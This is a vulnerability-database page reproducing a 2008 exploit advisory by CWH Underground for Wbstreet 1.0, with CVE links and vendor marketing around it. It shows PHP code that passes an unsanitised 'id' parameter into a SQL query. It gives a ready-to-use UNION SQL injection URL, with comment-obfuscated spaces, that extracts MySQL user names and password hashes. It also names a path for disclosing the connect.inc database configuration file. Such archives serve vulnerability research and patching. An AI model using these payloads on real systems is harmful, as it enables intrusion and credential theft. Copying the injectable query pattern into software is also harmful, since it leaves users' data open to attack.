Lucene search
+L

wbstreet 1.0 - SQL Injection / File Disclosure

🗓️ 04 Dec 2008 00:00:00Reported by CWH UndergroundType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Wbstreet v.1.0 Remote SQL Injection / File Disclosur

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-5955
4 Dec 200800:00
circl
Circl
CVE-2008-5956
4 Dec 200800:00
circl
CVE
CVE-2008-5955
23 Jan 200918:38
cve
CVE
CVE-2008-5956
23 Jan 200918:38
cve
Cvelist
CVE-2008-5955
23 Jan 200918:38
cvelist
Cvelist
CVE-2008-5956
23 Jan 200918:38
cvelist
Exploit DB
PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection
4 Dec 200800:00
exploitdb
EUVD
EUVD-2008-5925
7 Oct 202500:30
euvd
EUVD
EUVD-2008-5926
7 Oct 202500:30
euvd
NVD
CVE-2008-5955
23 Jan 200919:00
nvd
Rows per page
===================================================================
  Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability
===================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'


AUTHOR : CWH Underground
DATE   : 4 December 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Wbstreet
 VERSION     : v.1.0
 VENDOR	     : www.phpstreet.com
 DOWNLOAD    : www.ohlanla.com/Dowsload/177254922054.zip
#####################################################

-- Remote Database Disclosure --


[+] http://[Target]/[path]/connect.inc


-- Remote SQL Injection ---

-----------------
 Vulnerable Code
-----------------

if(isset($_GET['id'])){
	$id=$_GET['id'];
}
	.
	.
	.
	.
<?
$rs=mysql_db_query($db_name, "select * from topic where id=$id");  <<<< Bug !!!!
$row=mysql_fetch_array($rs);
?>

----------
 Exploit
----------

[+] http://[Target]/[path]/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user


#####################################################################
 Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
 Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-12-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation